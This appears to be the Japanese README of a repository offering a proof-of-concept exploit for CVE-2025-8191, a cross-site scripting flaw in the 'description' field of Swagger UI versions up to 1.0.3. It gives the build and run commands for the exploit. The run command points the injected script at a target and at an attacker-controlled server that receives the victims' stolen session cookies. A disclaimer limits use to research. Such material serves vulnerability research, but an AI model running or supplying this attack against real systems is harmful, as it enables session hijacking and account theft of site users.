
Swagger UIにおけるCVE‑2025‑8191のPoCエクスプロイトを含むリポジトリ。XSSインジェクションを利用してセッションCookieを外部に送信します。
このリポジトリには、Swagger UI で見つかった脆弱性 CVE-2025-8191 の Proof of Concept (PoC) エクスプロイトが含まれています。
この脆弱性により、"description" フィールドでのクロスサイトスクリプティング (XSS) インジェクションが可能となり、Swagger UI バージョン ≤ 1.0.3 でリモートスクリプト実行が引き起こされます。
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
http://target.com をターゲットの Swagger UI URL に、http://yourserver.com をデータ流出用の HTTP リスナーに置き換えてください。
このコードは教育およびセキュリティ研究目的のみに提供されます。明示的な許可がないシステムでは使用しないでください。著者は誤用に対する責任を負いません。
MIT ライセンス